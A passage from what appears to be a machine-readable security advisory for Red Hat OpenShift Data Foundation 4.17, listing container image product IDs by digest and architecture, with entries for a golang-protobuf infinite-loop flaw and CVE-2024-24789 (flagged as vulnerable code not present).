"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON"
},
{
"cve": "CVE-2024-24789",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2024-06-17T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
